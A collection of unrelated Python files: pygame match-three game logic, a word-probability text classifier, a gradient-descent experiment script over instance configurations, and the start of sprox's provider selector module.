if self.type == 1: # Passed
if Board.button_position[0][0] < mousex < Board.button_position[0][0]+100 \
and Board.button_position[0][1] - 50 < mousey < Board.button_position[0][1]: # Clicked replay button
if self.energy_num < 5:
self.level = 0
self.reset_mode = True
elif Board.button_position[1][0] < mousex < Board.button_position[1][0]+100 \
and Board.button_position[1][1]-50 < mousey < Board.button_position[1][1]: # Clicked next level button
if self.level < 10:
if self.energy_num < 5:
self.level = 0
else:
self.level += 1
self.reset_mode = True
elif 610 < mousex < 610 + 55 and 205 - 55 < mousey < 205: # x
self.level = 0
self.reset_mode = True
elif self.type == -1: # Failed
if Board.button_position[1][0] < mousex < Board.button_position[1][0]+100 \
and Board.button_position[1][1]-50 < mousey < Board.button_position[1][1]: # Clicked replay button
if self.energy_num < 5:
self.level = 0
self.reset_mode = True
elif Board.button_position[0][0] < mousex < Board.button_position[0][0]+100 \
and Board.button_position[0][1]-50 < mousey < Board.button_position[0][1]: # Clicked 5 more steps button
if self.money < 5:
self.level = 0
else:
self.money -= 5
self.step += 5
self.type = 0 # Playing game
self.fail_board = Board(Board.fail, [200, 0])
elif 610 < mousex < 610 + 55 and 205 - 55 < mousey < 205:
self.level = 0
self.reset_mode = True
elif self.type == 0:
if self.list_x < mousex < self.list_x + Manager.__brick_size * self.width \
and self.list_y < mousey < self.list_y + Manager.__brick_size * self.height:
mouse_selected = Manager.xy_rc(mousex, mousey)
if self.animal[mouse_selected[0]][mouse_selected[1]] != -1:
play_sound(Sounds.CLICK)
self.selected = mouse_selected
if (self.last_sel[0] == self.selected[0] and abs(self.last_sel[1] - self.selected[1]) == 1) \
or (self.last_sel[1] == self.selected[1] and abs(self.last_sel[0] - self.selected[0]) == 1):
self.swap_sign = 1 # Valid move, swap
elif Element.stop_position[0] < mousex < Element.stop_position[0]+self.stop_width\
and Element.stop_position[1] < mousey < Element.stop_position[1]+self.stop_width: # Exit button clicked
play_sound(Sounds.CLICK_BUTTON)
self.level = 0
self.reset_mode = True
else:
self.selected = [-1, -1]
def swap(self, spritegroup):
'''Swap two selected animals on the board.'''
if self.swap_sign == -1: # Not swapped
self.last_sel = self.selected
if self.swap_sign == 1:
last_x, last_y = Manager.rc_xy(self.last_sel[0], self.last_sel[1])
sel_x, sel_y = Manager.rc_xy(self.selected[0], self.selected[1])
if self.last_sel[0] == self.selected[0]: # Swap vertically
for animallist in spritegroup:
if animallist.rect.topleft == (last_x, last_y):
last_sprite = animallist
last_sprite.speed = [self.selected[1]-self.last_sel[1], 0]
elif animallist.rect.topleft == (sel_x, sel_y):
selected_sprite = animallist
selected_sprite.speed = [self.last_sel[1]-self.selected[1], 0]
else: # Swap horizontally
for animallist in spritegroup:
if animallist.rect.topleft == (last_x, last_y):
last_sprite = animallist
last_sprite.speed = [0, self.selected[0]-self.last_sel[0]]
elif animallist.rect.topleft == (sel_x, sel_y):
selected_sprite = animallist
selected_sprite.speed = [0, self.last_sel[0]-self.selected[0]]
while last_sprite.speed != [0, 0]:
delay(5)
self.draw_brick(last_x, last_y)
self.draw_brick(sel_x, sel_y)
last_sprite.move(last_sprite.speed)
selected_sprite.move(selected_sprite.speed)
self.screen.blit(last_sprite.image, last_sprite.rect)
self.screen.blit(selected_sprite.image, selected_sprite.rect)
pygame.display.flip()
self.swap_values()
if self.eliminate_animals():
self.step -= 1
else:
self.swap_values()
self.value_swapped = False
self.boom_sel = self.selected
self.swap_sign = -1
self.selected = [-1, -1]
def swap_values(self):
'''Swap values.'''
(xl, yl), (xc, yc) = self.last_sel, self.selected
self.animal[xl][yl], self.animal[xc][yc] = self.animal[xc][yc], self.animal[xl][yl]
def load_text(self, text, position, txt_size, txt_color=(255, 255, 255)):
'''Display text with given position, size and color.'''
my_font = pygame.font.SysFont(None, txt_size)
text_screen = my_font.render(text, True, txt_color)
self.screen.blit(text_screen, position)
def death_map(self):
'''Checks if there is not a valid move.'''
for i in range(self.row, self.row + self.height):
for j in range(self.col, self.col + self.width):
if self.animal[i][j] != -1:
if self.animal[i][j] == self.animal[i][j+1]:
if (self.animal[i][j] in [self.animal[i-1][j-1], self.animal[i+1][j-1]] \
and self.animal[i][j-1] != -1) or \
(self.animal[i][j] in [self.animal[i-1][j+2], self.animal[i+1][j+2]] \
and self.animal[i][j+2] != -1):
# a b
# a a
# c d
self.death_sign = False
break
if self.animal[i][j] == self.animal[i+1][j]:
if (self.animal[i][j] in [self.animal[i-1][j-1], self.animal[i-1][j+1]] \
and self.animal[i-1][j] != -1) or \
(self.animal[i][j] in [self.animal[i+2][j - 1], self.animal[i+2][j + 1]] \
and self.animal[i+2][j] != -1):
# a b
# a
# a
# c d
self.death_sign = False
break
else:
if self.animal[i-1][j-1] == self.animal[i][j]:
if (self.animal[i][j] == self.animal[i-1][j+1] and self.animal[i-1][j] != -1)\
or (self.animal[i][j] == self.animal[i+1][j-1] and self.animal[i][j-1] != -1):
# a a a b
# a a
# c a
self.death_sign = False
break
if self.animal[i][j] == self.animal[i+1][j+1]:
if (self.animal[i][j] == self.animal[i-1][j+1] and self.animal[i][j+1] != -1)\
or (self.animal[i][j] == self.animal[i+1][j-1] and self.animal[i+1][j] != -1):
# a b
# a a
# b a a a
self.death_sign = False
break
if self.death_sign:
delay(500)
Element(Element.none_animal, (230, 150)).draw(self.screen)
pygame.display.flip()
delay(500)
temp = [self.step, self.score, self.animal_num, self.ice_num, self.energy_num]
self.reset_mode = True
self.set_level_mode(self.level)
self.step = temp[0]
self.score = temp[1]
self.animal_num = temp[2]
self.ice_num = temp[3]
self.energy_num = temp[4]
else:
self.death_sign = True
# TODO: Merge 4 functions below
def exists_left(self, i, j, num):
'''Checks there are at least {num} continous same animals on the left side of (i, j).'''
for t in range(0, num):
if self.animal[i][j] != self.animal[i][j - t] or self.animal[i][j] < 0:
return False
return True
def exists_right(self, i, j, num):
'''Checks there are at least {num} continous same animals on the right side of (i, j).'''
for t in range(0, num):
if self.animal[i][j] != self.animal[i][j + t] or self.animal[i][j] < 0:
return False
return True
def exists_up(self, i, j, num):
'''Checks there are at least {num} continous same animals above (i, j).'''
for t in range(0, num):
if self.animal[i][j] != self.animal[i - t][j] or self.animal[i][j] < 0:
return False
return True
def exists_down(self, i, j, num):
'''Checks there are at least {num} continous same animals below (i, j).'''
for t in range(0, num):
if self.animal[i][j] != self.animal[i + t][j] or self.animal[i][j] < 0:
return False
return True
# TODO: Merge 4 functions below
def change_left(self, i, j, num):
'''Change the left side of the animal.'''
self.value_swapped = True
self.score += num
for k in range(0, int(num)):
self.animal[i][j - k] = -2
def change_right(self, i, j, num):
'''Change the right side of the animal.'''
self.value_swapped = True
self.score += num
for k in range(0, num):
self.animal[i][j + k] = -2
def change_up(self, i, j, num):
'''Change above the animal.'''
self.value_swapped = True
self.score += num
for k in range(0, num):
self.animal[i-k][j] = -2
def change_down(self, i, j, num):
'''Change below the animal.'''
self.value_swapped = True
self.score += num
for k in range(0, num):
self.animal[i+k][j] = -2
def eliminate_animals(self):
'''Eliminate the animals.'''
score_level = self.score
self.value_swapped = False
for i in range(self.row, self.row + self.height):
for j in range(self.col, self.col + self.width):
# TODO: Simplify the if statement below
if self.exists_right(i, j, 5):
self.value_swapped = True
if self.exists_down(i, j+2, 3):
self.animal_num[self.animal[i][j]] += 7
Sounds.eliminate(5) # Elimination sound 5
self.change_right(i, j, 5)
self.change_down(i, j+2, 3)
else:
self.animal_num[self.animal[i][j]] += 5
Sounds.eliminate(3) # Elimination sound 3
self.change_right(i, j, 5)
elif self.exists_right(i, j, 4):
self.value_swapped = True
if self.exists_down(i, j+1, 3):
self.animal_num[self.animal[i][j]] += 6
Sounds.eliminate(4) # Elimination sound 4
self.change_right(i, j, 4)
self.change_down(i, j+1, 3)
elif self.exists_down(i, j+2, 3):
self.animal_num[self.animal[i][j]] += 6
Sounds.eliminate(4) # Elimination sound 4
self.change_right(i, j, 4)
self.change_down(i, j+2, 3)
else:
self.animal_num[self.animal[i][j]] += 4
Sounds.eliminate(2) # Elimination sound 2
self.change_right(i, j, 4)
elif self.exists_right(i, j, 3):
self.value_swapped = True
if self.exists_down(i, j, 3):
self.animal_num[self.animal[i][j]] += 5
Sounds.eliminate(3) # Elimination sound 3
self.change_right(i, j, 3)
self.change_down(i, j, 3)
elif self.exists_down(i, j+1, 3):
self.animal_num[self.animal[i][j]] += 5
Sounds.eliminate(3) # Elimination sound 3
self.change_right(i, j, 3)
self.change_down(i, j+1, 3)
elif self.exists_down(i, j+2, 3):
self.animal_num[self.animal[i][j]] += 5
Sounds.eliminate(3) # Elimination sound 3
self.change_right(i, j, 3)
self.change_down(i, j + 2, 3)
else:
self.animal_num[self.animal[i][j]] += 3
Sounds.eliminate(1) # Elimination sound 1
self.change_right(i, j, 3)
elif self.exists_down(i, j, 5):
self.value_swapped = True
if self.exists_right(i+2, j, 3):
self.animal_num[self.animal[i][j]] += 7
Sounds.eliminate(5) # Elimination sound 5
self.change_down(i, j, 5)
self.change_right(i+2, j, 3)
elif self.exists_left(i+2, j, 3):
self.animal_num[self.animal[i][j]] += 7
Sounds.eliminate(5) # Elimination sound 5
self.change_down(i, j, 5)
self.change_left(i+2, j, 3)
else:
self.animal_num[self.animal[i][j]] += 5
Sounds.eliminate(3) # Elimination sound 3
self.change_down(i, j, 5)
elif self.exists_down(i, j, 4):
self.value_swapped = True
if self.exists_left(i+1, j, 3):
self.animal_num[self.animal[i][j]] += 6
Sounds.eliminate(4) # Elimination sound 4
self.change_down(i, j, 4)
self.change_left(i+1, j, 3)
elif self.exists_right(i+1, j, 3):
self.animal_num[self.animal[i][j]] += 6
Sounds.eliminate(4) # Elimination sound 4
self.change_down(i, j, 4)
self.change_right(i+1, j, 3)
elif self.exists_left(i+2, j, 3):
self.animal_num[self.animal[i][j]] += 6
Sounds.eliminate(4) # Elimination sound 4
self.change_down(i, j, 4)
self.change_left(i+2, j, 3)
elif self.exists_right(i+2, j, 3):
self.animal_num[self.animal[i][j]] += 6
Sounds.eliminate(4) # Elimination sound 4
self.change_down(i, j, 4)
self.change_right(i+2, j, 3)
else:
self.animal_num[self.animal[i][j]] += 4
Sounds.eliminate(2) # Elimination sound 2
self.change_down(i, j, 4)
elif self.exists_down(i, j, 3):
self.value_swapped = True
if self.exists_left(i+1, j, 3):
self.animal_num[self.animal[i][j]] += 5
Sounds.eliminate(3) # Elimination sound 3
self.change_down(i, j, 3)
self.change_left(i+1, j, 3)
elif self.exists_right(i+1, j, 3):
self.animal_num[self.animal[i][j]] += 5
Sounds.eliminate(3) # Elimination sound 3
self.change_down(i, j, 3)
self.change_right(i+1, j, 3)
elif self.exists_left(i+2, j, 3):
self.animal_num[self.animal[i][j]] += 5
Sounds.eliminate(3) # Elimination sound 3
self.change_down(i, j, 3)
self.change_left(i+2, j, 3)
elif self.exists_right(i+2, j, 3):
self.animal_num[self.animal[i][j]] += 5
Sounds.eliminate(3) # Elimination sound 3
self.change_down(i, j, 3)
self.change_right(i+2, j, 3)
elif self.exists_left(i+2, j, 2) and self.exists_right(i+2, j, 2):
self.animal_num[self.animal[i][j]] += 5
Sounds.eliminate(3) # Elimination sound 3
self.change_down(i, j, 3)
self.change_left(i+2, j, 2)
self.change_right(i+2, j, 2)
elif self.exists_left(i+2, j, 2) and self.exists_right(i+2, j, 3):
self.animal_num[self.animal[i][j]] += 6
Sounds.eliminate(4) # Elimination sound 4
self.change_down(i, j, 3)
self.change_left(i+2, j, 2)
self.change_right(i+2, j, 3)
elif self.exists_left(i+2, j, 3) and self.exists_right(i+2, j, 2):
self.animal_num[self.animal[i][j]] += 6
Sounds.eliminate(4) # Elimination sound 4
self.change_down(i, j, 3)
self.change_left(i+2, j, 3)
self.change_right(i+2, j, 2)
elif self.exists_left(i+2, j, 3) and self.exists_right(i+2, j, 3):
self.animal_num[self.animal[i][j]] += 7
Sounds.eliminate(5) # Elimination sound 5
self.change_down(i, j, 3)
self.change_left(i+2, j, 3)
self.change_right(i+2, j, 3)
else:
self.animal_num[self.animal[i][j]] += 3
Sounds.eliminate(1) # Elimination sound 1
self.change_down(i, j, 3)
self.fall_animal()
score_level = self.score - score_level # Score level
# Display & speak: good, great, amazing, excellent, unbelievable
if score_level < 5:
return self.value_swapped
if score_level < 8: # 5 good
Sounds.score_level(0)
Element(Element.score_level[0], (350, 250)).draw(self.screen)
pygame.display.flip()
delay(500)
elif score_level < 10: # 8 great
Sounds.score_level(1)
Element(Element.score_level[1], (350, 250)).draw(self.screen)
pygame.display.flip()
delay(500)
elif score_level < 15: # 10 amazing
Sounds.score_level(2)
Element(Element.score_level[2], (350, 250)).draw(self.screen)
pygame.display.flip()
delay(500)
elif score_level < 20: # 15 excellent
Sounds.score_level(3)
Element(Element.score_level[3], (350, 250)).draw(self.screen)
pygame.display.flip()
delay(500)
elif score_level >= 20: # 20 unbelievable
Sounds.score_level(4)
Element(Element.score_level[4], (350, 250)).draw(self.screen)
pygame.display.flip()
delay(500)
return self.value_swapped # Return the swap value sign
def fall_animal(self): # pylint: disable=too-many-locals
'''Animation of falling animals'''
clock = pygame.time.Clock()
position = []
ice_position = []
for i in range(self.row, self.row + self.height):
for j in range(self.col, self.col + self.width):
if self.animal[i][j] == -2:
x, y = self.rc_xy(i, j)
position.append((x, y))
if self.ice_list[i][j] == 1:
ice_position.append((x, y))
if position:
for index in range(0, 9):
clock.tick(20)
for pos in position:
self.draw_brick(pos[0], pos[1])
if pos in ice_position:
Element(Element.ice_format%index, (pos[0], pos[1])).draw(self.screen)
Element(Element.bling_format%index, (pos[0], pos[1])).draw(self.screen)
pygame.display.flip()
for i in range(self.row, self.row + self.height):
brick_position = []
fall_animal_list = []
speed = [0, 1]
for j in range(self.col, self.col + self.width):
if self.animal[i][j] == -2:
x, y = self.rc_xy(i, j)
if self.ice_list[i][j] == 1:
play_sound(Sounds.ICE_BREAKING)
self.ice_num += 1
self.ice_list[i][j] = -1
brick_position.append((x, y))
for m in range(i, self.row - 1, -1):
if self.animal[m - 1][j] != -1:
x, y = self.rc_xy(m - 1, j)
brick_position.append((x, y))
animal = Element(Element.animals[self.animal[m - 1][j]], (x, y))
fall_animal_list.append(animal)
self.animal[m][j] = self.animal[m - 1][j]
else:
self.animal[m][j] = randint(0, 5)
break
while speed != [0, 0] and fall_animal_list:
for position in brick_position:
self.draw_brick(position[0], position[1])
for animal_sprite in fall_animal_list:
animal_sprite.move(speed)
animal_sprite.draw(self.screen)
speed = animal_sprite.speed
pygame.display.flip()
def judge_next(self, tp, score):
'''Check whether the next level is reached or not'''
if tp == 1: # Passed
self.load_fns_window(score)
elif tp == -1: # Failed
self.load_fail_window()
def load_fail_window(self):
'''Display the failure board and buttons'''
sound_sign = 0
step_add = Board(Board.step_add, Board.button_position[0]) # L: 5 more steps
retry = Board(Board.replay, Board.button_position[1]) # R: Replay
self.screen.blit(self.fail_board.image, self.fail_board.rect) # Failure board
self.screen.blit(step_add.image, step_add.rect)
self.screen.blit(retry.image, retry.rect)
while self.fail_board.speed != [0, 0]:
self.draw()
self.screen.blit(self.fail_board.image, self.fail_board.rect)
self.fail_board.move()
pygame.display.flip()
if sound_sign == 0:
play_sound(Sounds.BOARD_SOUND)
sound_sign = 1
def load_fns_window(self, score):
'''Display the success board, score and buttons'''
sound_sign = 0
replay = Board(Board.replay, Board.button_position[0]) # L: Replay
self.screen.blit(self.success_board.image, self.success_board.rect) # Successful board
if self.level < 10: # If not the last level
next_level = Board(Board.next, Board.button_position[1]) # R: Next level
self.screen.blit(next_level.image, next_level.rect)
self.screen.blit(replay.image, replay.rect)
while self.success_board.speed != [0, 0]:
self.draw()
self.screen.blit(self.success_board.image, self.success_board.rect)
self.success_board.move()
pygame.display.flip()
if sound_sign == 0:
play_sound(Sounds.BOARD_SOUND)
sound_sign = 1
self.displayStars(score) # Display the stars
# Money
self.load_text(str(self.score*2), (Board.starts_position[0][0]+75, Board.starts_position[0][0]+46), 20, (0, 0, 0))
def displayStars(self, score):
'''Display the stars according to the score.'''
star1 = Board(Board.stars, Board.starts_position[0])
star2 = Board(Board.stars, Board.starts_position[1])
star3 = Board(Board.stars, Board.starts_position[2])
if 0 <= score < self.min:
self.load_text('1', (Board.starts_position[1][0]+48, Board.starts_position[1][1]+35), 20, (0, 0, 0))
self.screen.blit(star1.image, star1.rect)
elif self.min <= score <= self.max:
self.load_text('2', (Board.starts_position[1][0] + 48, Board.starts_position[1][1] + 35), 20, (0, 0, 0))
self.screen.blit(star1.image, star1.rect)
self.screen.blit(star2.image, star2.rect)
elif score > self.max:
self.load_text('5', (Board.starts_position[1][0] + 48, Board.starts_position[1][1] + 35), 20, (0, 0, 0))
self.screen.blit(star1.image, star1.rect)
self.screen.blit(star2.image, star2.rect)
self.screen.blit(star3.image, star3.rect)
pygame.display.flip()
def set_level_mode(self, level):
'''Set the level mode and its steps.'''
self.level = level
if self.reset_mode: # If it is required to reset the mode
self.num_sign = True
if level == 1:
self.__init__(7, 7)
self.animal[7][9] = self.animal[7][10] = self.animal[7][11] = self.animal[8][10] = self.animal[11][7] = \
self.animal[11][13] = self.animal[12][7] = self.animal[12][8] = self.animal[12][12] = self.animal[12][13] = \
self.animal[13][7] = self.animal[13][8] = self.animal[13][9] = self.animal[13][11] = self.animal[13][12] = \
self.animal[13][13] = -1
self.init_step = 17 # 17 initial steps
elif level == 2:
self.__init__(4, 8)
self.init_step = 16 # 16 initial steps
elif level == 3:
self.__init__(7, 7)
self.init_step = 18 # 18 initial steps
elif level == 4:
self.__init__(9, 7)
row, col = self.row, self.col
self.animal[row][col] = self.animal[row][col+7] = self.animal[row][col+8] = self.animal[row+1][col+8] = \
self.animal[row+5][col] = self.animal[row+6][col] = self.animal[row+6][col+1] = self.animal[row+6][col+8] = -1
self.init_step = 20
elif level == 5:
self.__init__(8, 9)
row, col = self.row, self.col
self.animal[row][col+7] = self.animal[row+2][col] = self.animal[row+5][col] = self.animal[row+3][col+7] = \
self.animal[row+6][col+7] = self.animal[row+8][col] = -1
self.init_step = 20
elif level == 6:
self.__init__(9, 9)
row, col = self.row, self.col
self.animal[row][col] = self.animal[row][col+8] = self.animal[row+2][col+4] = self.animal[row+3][col+2] = \
self.animal[row+3][col+6] = self.animal[row+8][col] = self.animal[row+8][col+8] = -1
for i in range(row+4, row+6):
for j in range(col+3, col+6):
self.animal[i][j] = -1
self.init_step = 28
elif level == 7:
self.__init__(9, 9)
row, col = self.row, self.col
for i in range(row, row + 9):
self.animal[i][col+4] = -1
for j in range(col, col+4):
self.animal[row+3][j] = -1
for j in range(col+5, col+9):
self.animal[row+5][j] = -1
self.init_step = 25
elif level == 8:
self.__init__(7, 8)
row, col = self.row, self.col
for i in range(row+2, row+5):
for j in range(col+1, col+6):
self.ice_list[i][j] = 1
self.init_step = 21
elif level == 9:
self.__init__(9, 9)
row, col = self.row, self.col
self.animal[row][col+4] = self.animal[row+4][col] = self.animal[row+4][col+8] = self.animal[row+8][col+4] = -1
for i in range(row+1, row+8):
for j in range(col+1, col+8):
self.ice_list[i][j] = 1
self.init_step = 35
else:
self.__init__(9, 9)
row, col = self.row, self.col
for i in range(row, row+2):
for j in range(col, col+9):
self.animal[i][j] = -1
self.animal[row][col+4] = randint(0, 5)
self.animal[row+1][col+2] = randint(0, 5)
self.animal[row+1][col+4] = randint(0, 5)
self.animal[row+1][col+6] = randint(0, 5)
self.animal[row+2][col+1] = self.animal[row+3][col+1] = self.animal[row+2][col+3] = self.animal[row+3][col+3] =\
self.animal[row+2][col+5] = self.animal[row+3][col+5] = self.animal[row+2][col+7] = \
self.animal[row+3][col+7] = self.animal[row+8][col] = self.animal[row+8][col+8] = -1
for i in range(row+4, row+8):
for j in range(col, col+9):
self.ice_list[i][j] = 1
self.ice_list[row+2][col+4] = self.ice_list[row+3][col+2] = self.ice_list[row+3][col+4] = \
self.ice_list[row+3][col+6] = 1
self.init_step = 40
self.type = 0
self.energy_num -= 5
self.success_board = Board(Board.success, [200, 0]) # Success board
self.fail_board = Board(Board.fail, [200, 0]) # Failure board
self.step = self.init_step
self.score = 0
self.animal_num = [0, 0, 0, 0, 0, 0]
self.ice_num = 0
self.reset_mode = False
def num_add(self):
'''Add to score'''
if self.num_sign:
self.money += self.score * 2
if self.score < self.min:
self.energy_num += 1
elif self.score < self.max:
self.energy_num += 2
else:
self.energy_num += 5
self.num_sign = False
def judge_level(self):
'''Check whether the level was passed'''
if self.step <= 0:
self.type = -1 # Game over
if self.level == 1:
if self.animal_num[4] >= 10: # L1: 10 frogs
self.type = 1 # Level 1 passed
self.num_add()
elif self.level == 2:
if self.animal_num[1] >= 21: # L2: 21 bears
self.type = 1 # Level 2 passed
self.num_add()
elif self.level == 3:
if self.animal_num[4] >= 16 and self.animal_num[5] >= 16: # L3: 16 frogs and 16 cows
self.type = 1 # Level 3 passed
self.num_add()
elif self.level == 4:
if self.animal_num[5] >= 18 and self.animal_num[2] >= 18: # L4: 18 cows and 18 chicks
self.type = 1 # Level 4 passed
self.num_add()
elif self.level == 5:
if self.animal_num[2] >= 28 and self.animal_num[0] >= 28: # L5: 28 chicks and 28 foxes
self.type = 1 # Level 5 passed
self.num_add()
elif self.level == 6:
if self.animal_num[4] >= 70: # L6: 70 frogs
self.type = 1 # Level 6 passed
self.num_add()
elif self.level == 7:
if self.animal_num[2] >= 36 and self.animal_num[1] >= 36 and self.animal_num[0] >= 36: # L7: 36 chickens, 36 bears and 36 foxes
self.type = 1 # Level 7 passed
self.num_add()
elif self.level == 8:
if self.ice_num >= 15: # L8: 15 ice
self.type = 1 # Level 8 passed
self.num_add()
elif self.level == 9:
if self.ice_num >= 49: # L9: 49 ice
self.type = 1 # Level 9 passed
self.num_add()
else:
if self.ice_num >= 39: # L10: 39 ice
self.type = 1 # Level 10 passed
self.num_add()
self.judge_next(self.type, self.score)
|
from collections import Counter
from numpy import log
from sklearn.base import BaseEstimator, ClassifierMixin
from data.data_examination import make_sig_words
from data.pipelines import (tokenize_pipe,
lower_pipe,
stem_pipe,
lemmatize_pipe)
class ProbabilisticClassifier(BaseEstimator, ClassifierMixin):
def __init__(
self,
log_table=None,
counter_table=None,
beta_method=False,
stem=False,
lemma=False):
"""
Called when initializing the classifier
"""
if counter_table is None:
counter_table = {}
if log_table is None:
log_table = {}
self.counterTable = counter_table
self.logTable = log_table
self.beta_method = beta_method
self.stem = stem
self.lemma = lemma
def fit(self, sentences, labels):
distinct_labels = set(labels)
if self.beta_method:
for l in distinct_labels:
self.logTable[l] = {}
s_by_a = {a:
[s for s, a1 in zip(sentences, labels) if a1 == a]
for a in distinct_labels}
tok_s_by_a = {
k:
list(tokenize_pipe(lower_pipe(v))) for k, v in s_by_a.items()}
beta_table = make_sig_words(
stem=self.stem,
lemma=self.lemma,
other_data=tok_s_by_a)
self.beta_table = beta_table
for l in beta_table:
for w in beta_table[l]:
self.logTable[l][w] = log(beta_table[l][w])
self.miss_p = {}
for l in distinct_labels:
self.miss_p[l] = min(self.logTable[l].values())
self.trained_ = True
return
for l in distinct_labels:
self.counterTable[l] = Counter()
piped = lower_pipe(sentences)
piped = tokenize_pipe(piped)
if self.stem:
piped = stem_pipe(piped)
if self.lemma:
piped = lemmatize_pipe(piped)
for s, l in zip(piped, labels):
for w in s:
self.counterTable[l][w] += 1
for l in distinct_labels:
ctr = self.counterTable[l]
tw = sum(ctr.values())
self.logTable[l] = {k: log(v / tw) for k, v in ctr.items()}
self.trained_ = True
def score_(self, w, l):
if self.hit_(w, l):
return self.logTable[l][w]
else:
if self.beta_method:
return self.miss_p[l]
else:
return 0
def hit_(self, w, l):
return w in self.logTable[l]
def predict(self, x):
try:
getattr(self, 'trained_')
except AttributeError:
raise RuntimeError('You must train the classifier before using it')
x = lower_pipe(x)
x = tokenize_pipe(x)
if self.stem:
x = stem_pipe(x)
if self.lemma:
x = lemmatize_pipe(x)
x = list(x)
return [self.predict_sen_(s) for s in x]
def predict_sen_(self, s):
words = s
scores = [
sum([self.score_(w, l) for w in words])
for l in self.logTable.keys()]
hits = [
sum([self.hit_(w, l) for w in words])
for l in self.logTable.keys()]
if self.beta_method:
maxin = scores.index(max(scores))
return list(self.logTable.keys())[maxin]
maxhits = max(hits)
merged = zip(scores, hits, self.logTable.keys())
maxes = [(s, l) for s, h, l in merged if h is maxhits]
return max(maxes, key=lambda x: x[0])[1]
|
import pandas
import pdb
import matplotlib
import numpy as np
#matplotlib.use('Agg')
#import matplotlib.pyplot as plt
import glob
import sys
#from matplotlib.ticker import MultipleLocator
import json
import os
import math
import random
import time
import BO_functions
from termcolor import colored
import subprocess
from joblib import Parallel, delayed
import multiprocessing
from pathlib import Path
models = ['candle', 'resnet', 'vgg', 'mtwnd', 'dien']
with open('configs/homogeneous.json') as f:
homo_key = json.load(f)
with open('configs/saving.json') as f:
saving = json.load(f)
num_iter = 100 # run monte-carlo
def check_step(gd, data, current_iter):
# check if data has reached a score
price = gd.best_price
checks = [k for k,v in data.items() if v == 0]
for check in checks:
if price <= check:
data[check] = current_iter
return data
def inner_loop(iteration, prices):
print(f'trial: {iteration}')
BO_functions.model = model
data = {} # num of iters needed to reach certain price
for j in prices:
# each price is associated with the number of samples to reach it
data[j] = 0
gd = BO_functions.GradientDescent(remain, seed=iteration)
total_space = len(gd.remain)
starting_point = gd.get_sp()
gd.initialize(starting_point)
current_iter = 0
data = check_step(gd, data, current_iter)
while data[optimal] == 0:
num_iter = gd.iterate()
current_iter += num_iter
data = check_step(gd, data, current_iter)
if current_iter + len(gd.remain) != total_space - 1: # minus one initialization point
print('error with trial counting')
sys.exit()
targets = gd.rate_history
within_qos = [k for k in targets if k <= 99]
qos_rate = len(within_qos)# / len(targets) * 100
explored_points = gd.config_history
cost = np.mean([BO_functions.total_price(model, *p) for p in explored_points])
return [data, qos_rate, cost]
usable_cores = os.sched_getaffinity(0)
for model in models:
BO_functions.model = model
xmax, ymax, zmax = BO_functions.max_instance(model)
pbounds = {'x': (0, xmax), 'y': (0, ymax), 'z': (0, zmax)}
remain = []
for x in range(0, xmax+1):
for y in range(0, ymax+1):
for z in range(0, zmax+1):
point = x, y, z
remain.append(point)
homo_p = BO_functions.total_price(model, homo_key[model], 0, 0)
saving_arr = np.array(saving[model][::-1])
hetero_p = homo_p * (1 - saving_arr / 100)
prices = [round(val,2) for val in hetero_p]
optimal = min(prices)
# record number of samples needed to reach the score
summary = {}
qos_rate = []
cost = []
for j in prices:
summary[j] = []
results = Parallel(n_jobs=len(usable_cores))(delayed(inner_loop)(i,prices) for i in range(num_iter))
for result in results:
qos_rate.append(result[1])
cost.append(result[2])
for j in prices:
ind = prices.index(j)
summary[prices[ind]].append(result[0][j])
Path("../BO/result/qos_rate").mkdir(parents=True, exist_ok=True)
Path("../BO/result/cost").mkdir(parents=True, exist_ok=True)
with open(f'../BO/result/{model}_gradient.json', 'w') as f:
json.dump(summary, f, indent=4)
with open(f'../BO/result/qos_rate/{model}_gradient.json', 'w') as f:
json.dump(qos_rate, f, indent=4)
with open(f'../BO/result/cost/{model}_gradient.json', 'w') as f:
json.dump(cost, f, indent=4)
|
<filename>sprox/providerselector.py
"""
Provider Locator Module
a module to help dbsprockets automatically find providers
Copyright (c) 2008 <NAME>
Original Version by <NAME> 2007
Released under MIT license.
"""
import inspect
try:
from sqlalchemy import MetaData
from sqlalchemy.engine import Engine
from sqlalchemy.orm import _mapper_registry, class_mapper
from sqlalchemy.orm.session import Session
from sqlalchemy.orm.scoping import ScopedSession
except ImportError: # pragma: no cover
pass
try: #pragma:no cover
from sqlalchemy.orm.instrumentation import ClassManager
except ImportError: #pragma:no cover
try: # pragma: no cover
#sa 0.6- support
from sqlalchemy.orm.attributes import ClassManager
except ImportError:
pass
SAORMProvider = None
try:
from sprox.sa.provider import SAORMProvider
except ImportError: # pragma: no cover
pass
#MongoKitProvider = None
#try:
# from sprox.mk.provider import MongoKitProvider
#except ImportError: # pragma: no cover
# pass
MingProvider = None
MappedClass = None
try:
from sprox.mg.provider import MingProvider
try:
from ming.odm.declarative import MappedClass
except ImportError: #pragma: no cover
from ming.orm.declarative import MappedClass
except ImportError: # pragma: no cover
pass
from sprox.dummyentity import DummyEntity
class ProviderSelector:
def __init__(self):
self._identifiers = {}
self._entities = {}
def get_entity(self, name, **hints):
raise NotImplementedError
def get_identifier(self, entity, **hints):
raise NotImplementedError
def get_provider(self, entity, **hints):
raise NotImplementedError
#class _MongoKitSelector(ProviderSelector):
# def get_identifier(self, entity, **hints):
# return entity.__name__
# def get_provider(self, entity=None, hint=None, **hints):
# #TODO cache
# return MongoKitProvider(None)
class _MingSelector(ProviderSelector):
#def get_identifier(self, entity, **hints):
# return entity.__name__
def get_provider(self, entity=None, hint=None, **hints):
#TODO cache
return MingProvider(entity.__mongometa__.session)
class _SAORMSelector(ProviderSelector):
def __init__(self):
self._providers = {}
def _get_engine(self, hint, hints):
metadata = hints.get('metadata', None)
engine = hints.get('engine', None)
session = hints.get('session', None)
if isinstance(hint, Engine):
engine=hint
if isinstance(hint, MetaData):
metadata=hint
if isinstance(hint, (Session, ScopedSession)):
session = hint
if session is not None and engine is None:
engine = session.bind
if metadata is not None and engine is None:
engine = metadata.bind
return engine
def get_entity(self, identifier, hint=None, **hints):
engine = self._get_engine(hint, hints)
for mapper in _mapper_registry:
if mapper.class_.__name__ == identifier:
if engine is None:
return mapper.class_
if engine is not None and mapper.tables[0].bind == engine:
return mapper.class_
raise KeyError('could not find model by the name %s in %s'%(model_name, metadata))
def get_identifier(self, entity, **hints):
return entity.__name__
def get_provider(self, entity=None, hint=None, **hints):
"""
:Arguments:
Entity
Mapped class to find a provider for
hint/hints
variables sent in to the provider to give more information about
how the provider connects to the database.
Get a provider related to the entity. (They should share the same engine)
The provider's are cached as not to waste computation/memory.
:Usage:
>>> from sprox.providerselector import SAORMSelector
